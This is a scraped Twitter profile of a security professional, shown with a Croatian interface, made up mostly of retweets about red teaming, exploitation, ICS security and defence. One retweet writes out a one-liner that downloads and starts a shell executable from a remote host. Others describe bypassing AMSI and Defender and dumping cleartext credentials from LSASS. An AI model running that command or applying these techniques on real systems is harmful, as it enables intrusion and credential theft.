Carp

@OTDefender

Security professional. Always learning. USAF🇺🇸

NC, USA
Vrijeme pridruživanja: siječanj 2014.

Tweetovi

Blokirali ste korisnika/cu @OTDefender

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @OTDefender

  1. proslijedio/la je Tweet
    4. velj
    Poništi
  2. proslijedio/la je Tweet
    4. velj

    My colleague just released a simple Yocto tutorial for Raspberry Pi's! It's a cool tutorial that shows you how to create custom-tailored embedded Linux "distributions" for your specific needs. Awesome for creating custom dropboxes!

    Poništi
  3. proslijedio/la je Tweet
    30. sij

    I found this article to be excellent. From building Windbg Tooling to working exploits. Its a dense and rich read. Really well done. I thought. Introduction to SpiderMonkey exploitation.

    Poništi
  4. proslijedio/la je Tweet
    30. sij

    We’ll be talking about new insights that’ll be valuable to ICS cybersecurity folks but aiming the level as also capturing new folks and bringing them up to speed, so should be a good foundational webinar for folks

    Poništi
  5. proslijedio/la je Tweet
    30. sij

    I just ran this in a VM and was not disappointed 😂

    Poništi
  6. proslijedio/la je Tweet
    29. sij

    Couple of rough notes on .NET stuff. Avoiding defender + manually patching AMSI to retain Assembly.Load() functionality =)

    Poništi
  7. proslijedio/la je Tweet
    30. sij

    Windows Red Team Cheat Sheet 1. Recon 2. Elevation of Privileges 3. Lateral Movement 4. Golden and Silver Tickets 5. AD Attacks 6. Bypass-Evasion Techniques 7. Miscellaneous 8. Post exploitation - information gathering 9. Summary of tools

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  8. 30. sij

    Wireguard -- VPN w/ state-of-the-art cryptography:

    Poništi
  9. proslijedio/la je Tweet
    28. sij

    .exe is the new .exe  -   Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info -

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet

    LOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file.

    Poništi
  11. proslijedio/la je Tweet
    28. sij
    Poništi
  12. proslijedio/la je Tweet
    26. sij

    Windows / Linux Local Privilege Escalation Workshop (Materials included !) 🥳

    Poništi
  13. proslijedio/la je Tweet
    25. sij

    This is gonna be awesome, if you want to know more about recon and being unique in attacking your targets ensure to join us tomorrow ;), Let's Get Ready To Rumble!!!

    Poništi
  14. proslijedio/la je Tweet
    24. sij

    Since I'm going through the hiring process again, I'm going to put some red flags here that lead to me immediately eliminating a candidate from a position.

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet

    Here are my slides from . Tuning ICS Security Alerts: An Alarm Management Approach

    Poništi
  16. proslijedio/la je Tweet
    22. sij

    DNS Rebinding attack in one Screenshot. 🙂

    Poništi
  17. proslijedio/la je Tweet
    22. sij

    Despite its incredible security enhancements, PowerShell continues to be abused by adversaries. A strong knowledge of PowerShell enables defenders to effectively manage and respond to its abuse. (1/4)

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    19. sij

    TIL you can implement a web server using awk

    Poništi
  19. proslijedio/la je Tweet
    19. sij

    "Haxe can build cross-platform applications targeting JavaScript, C++, C#, Java, JVM, Python, Lua, PHP, Flash and allows access to each platform native capabilities"

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·